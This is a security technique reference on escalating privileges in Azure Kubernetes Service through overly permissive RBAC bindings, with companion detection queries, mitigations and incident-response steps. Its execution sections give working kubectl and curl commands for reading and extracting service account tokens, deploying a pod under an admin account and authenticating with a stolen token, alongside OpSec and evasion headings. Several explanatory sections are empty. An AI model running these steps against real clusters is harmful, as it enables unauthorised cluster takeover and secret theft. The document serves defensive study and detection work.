MCADDF

[PE-ELEVATE-007]: AKS RBAC Excessive Permissions

Metadata

Attribute Details
Technique ID PE-ELEVATE-007
MITRE ATT&CK v18.1 T1548 - Abuse Elevation Control Mechanism
Tactic Privilege Escalation
Platforms Azure (Azure Kubernetes Service)
Severity Critical
Technique Status ACTIVE
Last Verified 2026-01-09
Affected Versions AKS clusters (all versions), Kubernetes RBAC implementation
Patched In N/A (configuration weakness, not a patchable software flaw)
Author SERVTEP / Artur Pchelnikau

1. EXECUTIVE SUMMARY

Concept: Azure Kubernetes Service (AKS) Role-Based Access Control (RBAC) misconfiguration allows attackers with limited Kubernetes cluster access to escalate privileges by exploiting overly permissive ClusterRole or Role bindings. The technique leverages the additive nature of Kubernetes RBAC, where a compromised service account accumulates excessive permissions through role bindings that inappropriately grant cluster-admin, admin, or edit roles across namespaces.

Attack Surface: Kubernetes API server, ClusterRole/Role definitions, RoleBinding/ClusterRoleBinding resources, service account token storage in pods, API audit logs.

Business Impact: Complete cluster compromise leading to workload exfiltration, lateral movement to backing infrastructure, and persistent backdoor installation. An attacker can move from a limited pod context to full cluster administration, enabling data theft, ransomware deployment across containerized applications, and supply chain attacks through container image manipulation.

Technical Context: This attack typically completes within seconds of obtaining initial pod access. Detection likelihood is low unless RBAC-focused audit policies are enabled. The escalation is often difficult to fully reverse without a comprehensive access review and credential re-provisioning.

Operational Risk

Compliance Mappings

Framework Control / ID Description
CIS Benchmark CIS v1.24 - 5.1.1 RBAC and Service Accounts - Least privilege role assignment
DISA STIG DISA-K8S-000001 Kubernetes pods must run with restricted service accounts
CISA SCuBA CISA-K8S-AC-01 Access Control - Enforce least privilege for service accounts
NIST 800-53 AC-3, AC-6 Access Enforcement, Least Privilege
GDPR Art. 32 Security of Processing - Access control mechanisms
DORA Art. 9 Protection and Prevention - System access controls
NIS2 Art. 21(1)(d) Managing access to assets and services
ISO 27001 A.9.2.3 Management of Privileged Access Rights
ISO 27005 Risk scenario Unauthorized privilege escalation; compromise of containerized workload isolation

2. TECHNICAL PREREQUISITES

Supported Versions:

Tools:


3. ENVIRONMENTAL RECONNAISSANCE

Management Station / Azure CLI Reconnaissance

Enumerate existing RBAC bindings to identify overly permissive roles:

# List all ClusterRoles with dangerous permissions
kubectl get clusterroles -o json | jq '.items[] | select(.rules[]? | select(.verbs[]? == "*" or .apiGroups[]? == "*")) | {name: .metadata.name, rules: .rules}'

# List all ClusterRoleBindings (who has what role)
kubectl get clusterrolebindings -o wide

# Check a specific service account's permissions
kubectl auth can-i --list --as=system:serviceaccount:default:default

What to Look For:

Version Note: Command syntax is consistent across Kubernetes 1.20+
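Offline, the same wildcard triage can be run against a saved `kubectl get clusterroles -o json` export. A minimal Python sketch (field names follow the standard RBAC schema; the sample data below is hypothetical):

```python
import json

def dangerous_cluster_roles(dump: dict) -> list:
    """Return names of ClusterRoles whose rules use wildcard verbs or apiGroups."""
    flagged = []
    for item in dump.get("items", []):
        for rule in item.get("rules") or []:
            if "*" in rule.get("verbs", []) or "*" in rule.get("apiGroups", []):
                flagged.append(item["metadata"]["name"])
                break  # one wildcard rule is enough to flag the role
    return flagged

# Hypothetical export: one wildcard role, one read-only role
dump = {"items": [
    {"metadata": {"name": "custom-admin"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
    {"metadata": {"name": "log-reader"},
     "rules": [{"apiGroups": [""], "resources": ["pods/log"], "verbs": ["get", "list"]}]},
]}
print(dangerous_cluster_roles(dump))  # ['custom-admin']
```

In practice, feed it the saved export: `dangerous_cluster_roles(json.load(open("clusterroles.json")))`.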

Pod-Based Reconnaissance (From Compromised Container)

# Check mounted service account token
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Test current permissions
kubectl auth can-i get pods --namespace=default
kubectl auth can-i create pods --namespace=default
kubectl auth can-i get secrets

# Enumerate cluster roles available
kubectl get clusterroles | head -20
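The mounted token is a JWT, so its claims (issuer, namespace, service account name) can be read offline without the signing key. A hedged Python sketch; the sample token is constructed here purely for illustration:

```python
import base64
import json

def jwt_claims(token: str) -> dict:
    """Decode the payload segment of a JWT without signature verification."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))

# Build a hypothetical service-account token (header.payload.signature)
claims = {"iss": "kubernetes/serviceaccount",
          "kubernetes.io/serviceaccount/namespace": "default",
          "kubernetes.io/serviceaccount/service-account.name": "default"}
seg = lambda obj: base64.urlsafe_b64encode(json.dumps(obj).encode()).decode().rstrip("=")
token = ".".join([seg({"alg": "RS256"}), seg(claims), "sig"])

print(jwt_claims(token)["kubernetes.io/serviceaccount/namespace"])  # default
```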

What to Look For:


4. DETAILED EXECUTION METHODS

METHOD 1: Exploiting Overly Permissive Default Service Account

Supported Versions: Kubernetes 1.20+, all AKS versions

Step 1: Verify Service Account Permissions

Objective: Determine if the default service account has excessive cluster permissions

Command:

kubectl auth can-i --list

Expected Output (Vulnerable):

Resources     Non-Resource URLs   Resource Names   Verbs
configmaps    []                  []               [*]
pods          []                  []               [*]
pods/log      []                  []               [*]

What This Means:

Step 2: Enumerate All Available ClusterRoles

Objective: Identify dangerous pre-built roles available in the cluster

Command:

kubectl get clusterroles -o json | jq -r '.items[] | .metadata.name' | sort

Expected Output:

admin
cluster-admin
edit
system:aggregate-to-admin
system:node
view
...

What This Means:

Step 3: Check Current RoleBindings

Objective: Identify which service accounts are bound to dangerous roles

Command:

kubectl get rolebindings,clusterrolebindings --all-namespaces -o json | jq '.items[] | select(.roleRef.name == "cluster-admin" or .roleRef.name == "edit" or .roleRef.name == "admin") | {namespace: .metadata.namespace, subject: .subjects[], role: .roleRef.name}'

Expected Output (Vulnerable):

{
  "namespace": "default",
  "subject": {
    "kind": "ServiceAccount",
    "name": "app-sa",
    "namespace": "default"
  },
  "role": "edit"
}
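This binding triage can also be done offline over a saved `kubectl get rolebindings,clusterrolebindings --all-namespaces -o json` export. A minimal sketch (the privileged-role set and sample binding are illustrative):

```python
PRIVILEGED = {"cluster-admin", "admin", "edit"}

def risky_bindings(dump: dict) -> list:
    """Return (subject, namespace, role) tuples for bindings to privileged roles."""
    hits = []
    for item in dump.get("items", []):
        role = item.get("roleRef", {}).get("name")
        if role not in PRIVILEGED:
            continue
        for s in item.get("subjects") or []:
            hits.append((f'{s["kind"]}/{s["name"]}',
                         s.get("namespace", item["metadata"].get("namespace", "")),
                         role))
    return hits

# Hypothetical export with one binding of a service account to "edit"
dump = {"items": [{"metadata": {"name": "app-binding", "namespace": "default"},
                   "roleRef": {"name": "edit"},
                   "subjects": [{"kind": "ServiceAccount", "name": "app-sa",
                                 "namespace": "default"}]}]}
print(risky_bindings(dump))  # [('ServiceAccount/app-sa', 'default', 'edit')]
```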

What This Means:

OpSec & Evasion:

Step 4: Create Privilege Escalation Pod

Objective: Deploy a new pod with escalated permissions

Command:

# Create a pod under the (pre-existing) high-privilege service account admin-sa.
# "sleep infinity" keeps the alpine container running instead of exiting immediately.
kubectl create deployment escalate-pod --image=alpine --namespace=default -- sleep infinity
kubectl patch deployment escalate-pod --patch '{"spec":{"template":{"spec":{"serviceAccountName":"admin-sa"}}}}' --namespace=default

Expected Output:

deployment.apps/escalate-pod created
deployment.apps/escalate-pod patched

What This Means:

Troubleshooting:

Step 5: Access Elevated Permissions from New Pod

Objective: Verify privilege escalation within the new pod container

Command (Execute inside the pod):

kubectl exec -it escalate-pod-<hash> -- /bin/sh

# Inside the pod (assumes kubectl is available in the image; otherwise use curl
# with the token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token):
kubectl auth can-i --list
kubectl get secrets -n kube-system

Expected Output:

Resources     Non-Resource URLs   Resource Names   Verbs
*.*           []                  []               [*]

NAME                                      TYPE                                  DATA
...

What This Means:

OpSec & Evasion:


METHOD 2: Exploiting ClusterRole Wildcard Permissions

Supported Versions: Kubernetes 1.20+

Step 1: Identify Dangerous ClusterRoles with Wildcards

Objective: Find ClusterRoles that grant * (wildcard) permissions

Command:

kubectl get clusterroles -o json | jq '.items[] | select(.rules[]? | select(.verbs[]? == "*" or .apiGroups[]? == "*")) | {name: .metadata.name, rules: .rules}'

Expected Output (Vulnerable):

{
  "name": "custom-admin",
  "rules": [
    {
      "apiGroups": ["*"],
      "resources": ["*"],
      "verbs": ["*"]
    }
  ]
}
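Wildcards are not the only escalation path: verbs such as bind, escalate, and impersonate, or the ability to create pods (which lets an attacker mount any service account token in the namespace), also lead upward. A hedged sketch of a rule-level check; the escalation-pair list is an illustrative subset, not exhaustive:

```python
# Verb/resource pairs that allow further privilege escalation even without "*"
ESCALATION_PATHS = [
    ("bind", "rolebindings"), ("bind", "clusterrolebindings"),
    ("escalate", "roles"), ("escalate", "clusterroles"),
    ("impersonate", "users"), ("impersonate", "serviceaccounts"),
    ("create", "pods"),  # pod creation allows mounting any SA token in-namespace
]

def can_escalate(rules: list) -> bool:
    """True if any rule grants a wildcard or a known escalation verb/resource pair."""
    for rule in rules:
        verbs = set(rule.get("verbs", []))
        resources = set(rule.get("resources", []))
        if "*" in verbs and "*" in resources:
            return True
        for verb, resource in ESCALATION_PATHS:
            if ({verb, "*"} & verbs) and ({resource, "*"} & resources):
                return True
    return False

print(can_escalate([{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]))      # True
print(can_escalate([{"apiGroups": [""], "resources": ["pods/log"], "verbs": ["get"]}]))  # False
```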

What This Means:

Step 2: Identify Service Accounts Bound to Wildcard Roles

Objective: Find which service accounts are bound to dangerous roles

Command:

kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name == "custom-admin") | {name: .metadata.name, subjects: .subjects[]}'

Expected Output:

{
  "name": "custom-admin-binding",
  "subjects": {
    "kind": "ServiceAccount",
    "name": "app-service",
    "namespace": "applications"
  }
}

What This Means:

Step 3: Escalate from Current Pod to Admin Service Account

Objective: Transition from limited pod context to admin service account

Command:

# Use the admin service account's token (if accessible). Note: from Kubernetes
# 1.24 onward, token Secrets are no longer auto-created, so this only works
# where a long-lived token Secret exists for the account.
export TOKEN=$(kubectl get secret -n applications $(kubectl get secret -n applications | grep app-service | awk '{print $1}') -o jsonpath='{.data.token}' | base64 -d)

# Configure kubectl to use the admin token
kubectl config set-credentials admin-creds --token=$TOKEN
kubectl config set-context admin-context --user=admin-creds --cluster=<cluster-name>
kubectl config use-context admin-context

# Verify escalation
kubectl auth can-i --list

Expected Output:

Resources     Non-Resource URLs   Resource Names   Verbs
*.*           []                  []               [*]

What This Means:

OpSec & Evasion:


METHOD 3: RBAC Lateral Movement via Service Account Token Theft

Supported Versions: Kubernetes 1.20+

Step 1: Identify Service Accounts with Higher Permissions in Other Namespaces

Objective: Enumerate all service accounts and their RBAC bindings cluster-wide

Command:

# List all service accounts and their namespaces
kubectl get serviceaccounts --all-namespaces -o json | jq '.items[] | {namespace: .metadata.namespace, name: .metadata.name}'

# For each service account, check its role bindings
for ns in $(kubectl get ns -o jsonpath='{.items[*].metadata.name}'); do
  echo "=== Namespace: $ns ==="
  kubectl get rolebindings -n $ns -o json | jq '.items[] | {role: .roleRef.name, subjects: .subjects[]}'
done

Expected Output:

{
  "namespace": "default",
  "name": "default"
}
{
  "namespace": "kube-system",
  "name": "kubernetes-dashboard"
}
...

What This Means:

Step 2: Extract Token from Target Service Account

Objective: Obtain the JWT token of a service account with higher privileges

Command:

# If you have RBAC access to list secrets in kube-system or other namespaces
# (targets long-lived token Secrets, which are not auto-created since Kubernetes 1.24)
kubectl get secret -n kube-system -o json | jq '.items[] | select(.type == "kubernetes.io/service-account-token") | {name: .metadata.name, namespace: .metadata.namespace}'

# Extract a specific token
SECRET_NAME=$(kubectl get secret -n kube-system | grep kubernetes-dashboard | awk '{print $1}')
kubectl get secret $SECRET_NAME -n kube-system -o jsonpath='{.data.token}' | base64 -d

Expected Output:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Ii...

What This Means:

Step 3: Use Extracted Token for Privilege Escalation

Objective: Authenticate as the higher-privilege service account

Command:

# Use the extracted token to make API calls
curl -k -H "Authorization: Bearer $EXTRACTED_TOKEN" https://kubernetes.default.svc.cluster.local/api/v1/pods

# Or configure kubectl with the token (note: the --cluster flag takes the
# cluster name from kubeconfig, not the context name)
kubectl config set-credentials dashboard-sa --token=$EXTRACTED_TOKEN
kubectl config set-context dashboard-context --user=dashboard-sa --cluster=$(kubectl config view --minify -o jsonpath='{.clusters[0].name}')
kubectl config use-context dashboard-context

# Verify escalation
kubectl auth can-i delete clusterrolebindings

Expected Output:

yes

What This Means:

OpSec & Evasion:


5. TOOLS & COMMANDS REFERENCE

kubectl

Version: Latest stable (v1.28+) Minimum Version: 1.20 Supported Platforms: Linux, Windows, macOS

Installation:

# Download and install kubectl
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x kubectl
sudo mv kubectl /usr/local/bin/

Usage:

# Check permissions
kubectl auth can-i get pods

# List roles
kubectl get roles,clusterroles

# Create a pod
kubectl create deployment app --image=nginx

Azure CLI

Version: Latest stable (2.55+) Minimum Version: 2.0 Supported Platforms: Linux, Windows, macOS

Installation:

# macOS
brew install azure-cli

# Linux
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

# Windows
choco install azure-cli

Usage:

# Connect to AKS
az aks get-credentials --resource-group myGroup --name myCluster
kubectl config current-context

# List AKS clusters
az aks list --output table

kubescape

Version: 3.0+ Minimum Version: 2.0 Supported Platforms: Linux, Windows, macOS

Installation:

# From the official install script
curl -s https://raw.githubusercontent.com/kubescape/kubescape/master/install.sh | /bin/bash

Usage:

# Scan the cluster, including RBAC misconfiguration checks
kubescape scan --kubeconfig ~/.kube/config

6. ATTACK SIMULATION & VERIFICATION

Atomic Red Team

Reference: Atomic Red Team has no Kubernetes-specific test for this technique; the closest coverage is the generic Atomic Red Team T1548 test suite.


7. MICROSOFT SENTINEL DETECTION

Query 1: Detect ClusterRole/RoleBinding Creation or Modification

Rule Configuration:

KQL Query:

AzureDiagnostics
| where Category in ("kube-audit", "kube-audit-admin")
| extend audit = parse_json(log_s)
| where tostring(audit.verb) in ("create", "update", "patch")
| where tostring(audit.objectRef.resource) in ("clusterrolebindings", "rolebindings")
| where tostring(audit.objectRef.apiGroup) contains "rbac"
| extend UserIdentity = tostring(audit.user.username)
| extend RoleName = tostring(audit.objectRef.name)
| summarize Count = count() by UserIdentity, RoleName, Verb = tostring(audit.verb)
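The same detection logic can be prototyped offline against exported kube-audit events (one JSON object per line, following the Kubernetes audit schema); a hedged Python sketch with hypothetical events:

```python
import json
from collections import Counter

def binding_changes(audit_lines):
    """Count RBAC-binding writes per (user, role, verb) over audit-log lines."""
    counts = Counter()
    for line in audit_lines:
        ev = json.loads(line)
        ref = ev.get("objectRef", {})
        if (ev.get("verb") in {"create", "update", "patch"}
                and ref.get("resource") in {"clusterrolebindings", "rolebindings"}
                and "rbac" in ref.get("apiGroup", "")):
            counts[(ev["user"]["username"], ref.get("name"), ev["verb"])] += 1
    return counts

# Hypothetical audit events: one binding creation, one unrelated pod read
events = [json.dumps({"verb": "create",
                      "user": {"username": "system:serviceaccount:default:app-sa"},
                      "objectRef": {"resource": "clusterrolebindings",
                                    "apiGroup": "rbac.authorization.k8s.io",
                                    "name": "escalate-binding"}}),
          json.dumps({"verb": "get",
                      "user": {"username": "admin"},
                      "objectRef": {"resource": "pods", "apiGroup": ""}})]
print(binding_changes(events))
```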

What This Detects:

Manual Configuration Steps (Azure Portal):

  1. Navigate to Azure Portal → Microsoft Sentinel
  2. Select your workspace → Analytics → + Create → Scheduled query rule
  3. General Tab:
    • Name: AKS RBAC Binding Modification Detected
    • Severity: High
  4. Set rule logic Tab:
    • Paste the KQL query above
    • Run query every: 5 minutes
    • Lookup data from the last: 1 hour
  5. Incident settings Tab:
    • Enable Create incidents
  6. Click Review + create

Query 2: Detect Service Account Token Extraction or Abuse

KQL Query:

AzureDiagnostics
| where Category in ("kube-audit", "kube-audit-admin")
| extend audit = parse_json(log_s)
| where tostring(audit.verb) == "get"
| where tostring(audit.objectRef.resource) == "secrets"
| where tostring(audit.objectRef.namespace) in ("kube-system", "kube-public")
| where tostring(audit.user.groups) !contains "system:masters"
| extend ServiceAccount = tostring(audit.user.username)
| extend TargetNamespace = tostring(audit.objectRef.namespace)
| project TimeGenerated, ServiceAccount, TargetNamespace, SecretName = tostring(audit.objectRef.name)
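Likewise, this query's logic can be prototyped offline over exported kube-audit events; a hedged sketch (event fields follow the Kubernetes audit schema; the sample event is hypothetical):

```python
import json

def suspicious_secret_reads(audit_lines):
    """Flag reads of Secrets in system namespaces by non-system:masters principals."""
    hits = []
    for line in audit_lines:
        ev = json.loads(line)
        ref = ev.get("objectRef", {})
        if (ev.get("verb") == "get"
                and ref.get("resource") == "secrets"
                and ref.get("namespace") in {"kube-system", "kube-public"}
                and "system:masters" not in ev.get("user", {}).get("groups", [])):
            hits.append((ev["user"]["username"], ref["namespace"], ref.get("name")))
    return hits

# Hypothetical event: a workload service account reading a kube-system Secret
events = [json.dumps({"verb": "get",
                      "user": {"username": "system:serviceaccount:default:app-sa",
                               "groups": ["system:serviceaccounts"]},
                      "objectRef": {"resource": "secrets", "namespace": "kube-system",
                                    "name": "dashboard-token-abc12"}})]
print(suspicious_secret_reads(events))
```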

What This Detects:


8. WINDOWS EVENT LOG MONITORING

Not applicable for AKS cluster-side detection. Monitoring should occur at the Azure platform level via Microsoft Sentinel/Defender for Cloud or on the container host via kubelet logs.


9. MICROSOFT DEFENDER FOR CLOUD

Detection Alert: Suspicious Kubernetes Role Assignment

Alert Name: “Suspicious role assignment in Kubernetes cluster”

Manual Configuration Steps (Enable Defender for Cloud):

  1. Navigate to Azure Portal → Microsoft Defender for Cloud
  2. Go to Environment settings
  3. Select your subscription
  4. Under Defender plans, enable:
    • Defender for Servers: ON
    • Defender for Containers: ON (supersedes the former Defender for Kubernetes plan)
  5. Click Save
  6. Go to Security alerts to view triggered alerts
  7. For Kubernetes-specific alerts, review: Defender for Containers → Workloads → Pod-level detections

Reference: Microsoft Defender for Kubernetes Threat Detection


10. DEFENSIVE MITIGATIONS

Priority 1: CRITICAL

Priority 2: HIGH

Access Control & Policy Hardening

Validation Command (Verify Fix)

# Check if cluster-admin is only bound to trusted users
kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name == "cluster-admin")'

# List all service accounts and their permissions
kubectl get serviceaccounts --all-namespaces -o json | jq -r '.items[] | "\(.metadata.namespace):\(.metadata.name)"' | while read SA; do
  NS=$(echo $SA | cut -d: -f1)
  NAME=$(echo $SA | cut -d: -f2)
  echo "=== $SA ==="
  kubectl auth can-i --list --as=system:serviceaccount:$NS:$NAME 2>/dev/null | grep -E "^\*|create|delete|patch"
done

Expected Output (If Secure):

No ClusterRoleBindings for cluster-admin (or only for system accounts)

=== default:app-sa ===
configmaps                         []  []  [get list watch]
pods                               []  []  [get list watch]
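At scale, the plain-text `kubectl auth can-i --list` output from the validation loop can be post-processed automatically. A hedged sketch that flags rows carrying write or wildcard verbs (the sample output below is hypothetical):

```python
def write_capable(can_i_list_output: str) -> list:
    """Return resources whose verb list includes a write verb or a wildcard."""
    risky_verbs = {"*", "create", "delete", "patch", "update"}
    flagged = []
    for line in can_i_list_output.splitlines()[1:]:  # skip the header row
        parts = line.split()
        if not parts:
            continue
        verbs = {v.strip("[]") for v in parts[3:]}  # the Verbs column
        if verbs & risky_verbs:
            flagged.append(parts[0])
    return flagged

sample = """Resources    Non-Resource URLs   Resource Names   Verbs
configmaps   []                  []               [get list watch]
pods         []                  []               [get list watch]
*.*          []                  []               [*]"""
print(write_capable(sample))  # ['*.*']
```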

What to Look For:


11. DETECTION & INCIDENT RESPONSE

Indicators of Compromise (IOCs)

Forensic Artifacts

Response Procedures

  1. Isolate:

    Command:

    # Immediately delete the compromised pod
    kubectl delete pod <compromised-pod> --namespace=<namespace>
       
    # Or invalidate its tokens by deleting and recreating the service account
    # (token Secrets are annotated with kubernetes.io/service-account.name,
    # not labeled, so a label selector would not match them)
    kubectl delete serviceaccount <sa-name> --namespace=<namespace>
    kubectl create serviceaccount <sa-name> --namespace=<namespace>
    

    Manual (Azure Portal):

    • Go to Azure Portal → Your AKS cluster → Workloads
    • Find the compromised pod → Click Delete
  2. Collect Evidence:

    Command:

    # Export audit logs (note: on AKS the control plane is managed and
    # kube-apiserver pods are not visible; pull kube-audit logs from the
    # Log Analytics workspace configured in diagnostic settings instead)
    kubectl logs -n kube-system -l component=kube-apiserver | grep -i "rolebinding\|clusterrolebinding" > /evidence/audit-logs.txt
       
    # Export pod logs
    kubectl logs <compromised-pod> --namespace=<namespace> --all-containers > /evidence/pod-logs.txt
       
    # Export service account secrets
    kubectl get secret -n <namespace> -o yaml > /evidence/secrets.yaml
    
  3. Remediate:

    Command:

    # Review and delete unauthorized role bindings
    kubectl delete rolebinding <malicious-binding> --namespace=<namespace>
    kubectl delete clusterrolebinding <malicious-cluster-binding>
       
    # Restore default RBAC policies from backup or redeploy cluster
    kubectl apply -f <backup-rbac-config>.yaml
    

12. COMPLETE ATTACK CHAIN

Step Phase Technique Description
1 Initial Access [IA-EXPLOIT-005] AKS Control Plane Exploitation Gain initial access to the cluster via exposed Kubelet API or container escape
2 Privilege Escalation [PE-ELEVATE-007] AKS RBAC Excessive Permissions Exploit misconfigured RBAC to escalate from pod to cluster-admin
3 Lateral Movement [LM-AUTH-030] AKS Service Account Token Theft Extract and abuse service account tokens for cross-namespace movement
4 Credential Access [CA-TOKEN-013] AKS Service Account Token Theft Harvest tokens from compromised service accounts
5 Persistence [PERSIST-009] Kubernetes Secret Injection Create backdoor service accounts and roles for persistent access
6 Impact Container Image Tampering / Workload Exfiltration Manipulate deployments or exfiltrate containerized data

13. REAL-WORLD EXAMPLES

Example 1: Tesla Kubernetes Cluster Breach (2018)

Example 2: Kubernetes Namespace Isolation Bypass (Shopify Security Audits)